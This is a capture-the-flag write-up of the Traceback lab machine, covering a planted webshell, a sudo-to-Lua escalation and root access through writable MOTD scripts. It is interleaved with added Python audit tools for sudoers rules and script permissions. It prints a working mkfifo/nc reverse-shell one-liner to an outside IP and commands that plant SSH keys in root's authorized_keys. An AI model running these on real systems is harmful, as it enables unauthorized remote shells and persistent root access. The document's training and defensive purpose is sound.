System Summary
Initial Enumeration
The nmap scan reveals only SSH and HTTP
The web server's main page is a simple static page:
Looking at the GitHub repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying their names against the Traceback machine we can see there is one running:
Initial Foothold
Using admin:admin we get access to a panel where we can upload files, list directory contents, etc. Our first objective is to upload a PHP reverse shell (there are many on the internet) and get a shell:
We're in as user webadmin.
The next step is to enumerate other users.
User Flag
There is another user named sysadmin:
There is a note file in the webadmin home:
Lua is a scripting language.
It also seems that user webadmin can run luvit (a Lua interpreter) as user sysadmin via sudo (no password).
The obvious step here is to create a script such as /tmp/nik.lua:
    os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")
and run it as:
    sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua
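The escalation above works because a NOPASSWD sudo rule hands webadmin an interpreter that runs as sysadmin, and an interpreter can execute arbitrary code. The following Python is an added defender-side example, not code from the original writeup: it parses sudoers-style rule lines and flags rules that grant a shell or interpreter, or an unrestricted ALL, to a non-root user, noting when no password is required. The sample sudoers text and the list of code-execution binaries are constructed for this example; the exact rule on the box is an assumption based on the behaviour described above.

```python
import re
from dataclasses import dataclass, field

# Binaries that let the caller run arbitrary code as the sudo target user.
# Illustrative list constructed for this example, not an exhaustive one.
CODE_EXEC_BINARIES = {
    "luvit", "lua", "python", "python3", "perl", "ruby", "node",
    "sh", "bash", "dash", "zsh",
}

# Matches:  user  host=(runas[:group]) [TAG: ...] cmd1, cmd2
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    reasons: list = field(default_factory=list)


def parse_sudoers(text):
    """Return (user, runas_user, tags, command) tuples from sudoers-style text."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # Only the user half of "(user:group)" matters for who the command runs as.
        runas = m.group("runas").split(":")[0].strip() or "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("user"), runas, tags, cmd.strip()))
    return rules


def audit_rules(rules):
    """Flag rules that amount to arbitrary code execution as another user."""
    findings = []
    for user, runas, tags, cmd in rules:
        if user == "root":
            continue                                   # root already has everything
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command list")
        else:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in CODE_EXEC_BINARIES:
                reasons.append(f"{binary} executes arbitrary code as {runas}")
        if reasons and "NOPASSWD" in tags:
            reasons.append("no password required")
        if reasons:
            findings.append(Finding(user, runas, cmd, reasons))
    return findings


# Constructed sample; the webadmin rule mirrors the behaviour described in the writeup.
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/sbin/service nginx restart
webadmin ALL=(sysadmin) NOPASSWD: /home/sysadmin/luvit
"""

if __name__ == "__main__":
    for f in audit_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{f.user} -> {f.runas}: {f.command}  [{'; '.join(f.reasons)}]")
```

On a real host the same functions can be fed the output of `sudo -l` reformatted as rules, or the contents of /etc/sudoers and /etc/sudoers.d/*; the remediation for a hit is to restrict the rule to a specific script with fixed arguments rather than an interpreter.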
And we get a shell as sysadmin.
Root Flag
As sysadmin, the next step is enumeration with tools like LinEnum or similar. But it seems that there is nothing interesting.
Looking with pspy to see running processes we can see that there is a recurrent task:
There is a process (running as root) that copies files from /var/backups/.update-motd.d/ to /etc/update-motd.d every minute.
Interesting... it looks like something that cleans up corrupted files.
In fact, user sysadmin can modify all files in /etc/
The interesting thing is that sshd will run these files as root to show the MOTD and additional messages to every SSH session created.
So we can modify one of the files above to run a command as root and gain access, but we have to be fast because within one minute the file will be cleaned up.
The sequence of operations is:
- Add our public SSH key to /home/sysadmin/.ssh/authorized_keys (so we can get access and also keep our key in place for further use)
- Run the command echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header, appending our code so that it is executed at the next SSH session
- Log on as sysadmin via SSH (we should be able to do this as we added the key). This operation should result in the execution of cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys
- Log on as root (the previous command should have added our key to root's authorized keys)
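The root step relies on scripts that run as root being writable by a non-root user; the one-minute restore job only limits the window, it does not remove the weakness. The following Python is an added defender-side example, not code from the original writeup: it audits a directory of root-executed scripts such as /etc/update-motd.d and reports every file (or the directory itself) that someone other than the trusted owner could change. The sample directory, file names and modes are constructed for this example in a temporary directory; the function names are hypothetical.

```python
import os
import stat
import tempfile
from pathlib import Path


def audit_root_run_scripts(directory, trusted_uid=0):
    """Report scripts in `directory` that a principal other than the trusted owner
    could modify. Returns {name: [reasons]}; an empty dict means nothing was flagged."""
    findings = {}
    base = Path(directory)
    if base.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        # A writable directory lets files be replaced even if each file is 0644.
        findings["."] = ["directory is group- or world-writable"]
    for entry in sorted(base.iterdir()):
        if not entry.is_file():
            continue
        st = entry.stat()
        reasons = []
        if st.st_uid != trusted_uid:
            reasons.append(f"owned by uid {st.st_uid}, not the trusted owner")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if reasons:
            findings[entry.name] = reasons
    return findings


def build_sample_dir():
    """Constructed stand-in for /etc/update-motd.d: three scripts with different modes.
    Returns the directory path and the uid that owns the files (the current user)."""
    d = tempfile.mkdtemp(prefix="motd-audit-")
    modes = {"00-header": 0o755, "10-help-text": 0o775, "50-motd-news": 0o777}
    for name, mode in modes.items():
        p = Path(d, name)
        p.write_text("#!/bin/sh\necho 'constructed sample'\n")
        os.chmod(p, mode)
    return d, os.getuid()


if __name__ == "__main__":
    sample_dir, owner = build_sample_dir()
    for name, reasons in audit_root_run_scripts(sample_dir, trusted_uid=owner).items():
        print(f"{name}: {', '.join(reasons)}")
    # On a real host, with the default trusted_uid=0:
    #     audit_root_run_scripts("/etc/update-motd.d")
```

Anything the audit flags should be root-owned and mode 0755 or tighter; a scheduled copy from a backup location, like the one seen with pspy, is not a substitute for correct ownership, and an audit rule or file-integrity monitor on that directory would surface the modification itself rather than only repairing it afterwards.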